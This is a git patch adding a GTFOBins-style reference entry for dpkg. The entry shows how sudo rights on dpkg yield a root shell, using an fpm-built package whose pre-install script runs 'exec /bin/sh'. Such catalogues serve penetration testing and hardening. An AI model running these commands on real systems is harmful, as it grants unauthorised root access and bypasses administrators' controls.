From 7a3ae6e05af41fc3367748afc16d6261de0fa2f8 Mon Sep 17 00:00:00 2001 From: Emilio Date: Sat, 2 Feb 2019 15:13:28 +0000 Subject: [PATCH] Add dpkg thanks to https://lsdsecurity.com/2019/01/linux-privilege-escalation-using-apt-get-apt-dpkg-to-abuse-sudo-nopasswd-misconfiguration/ as in #51 --- _gtfobins/dpkg.md | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 _gtfobins/dpkg.md diff --git a/_gtfobins/dpkg.md b/_gtfobins/dpkg.md new file mode 100644 index 0000000..00a7523 --- /dev/null +++ b/_gtfobins/dpkg.md @@ -0,0 +1,12 @@ +--- +functions: + sudo: + - description: | + It runs an interactive shell using a specially crafted Debian package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target. + ``` + TF=$(mktemp -d) + echo 'exec /bin/sh' > $TF/x.sh + fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF + ``` + code: sudo dpkg -i x_1.0_all.deb +---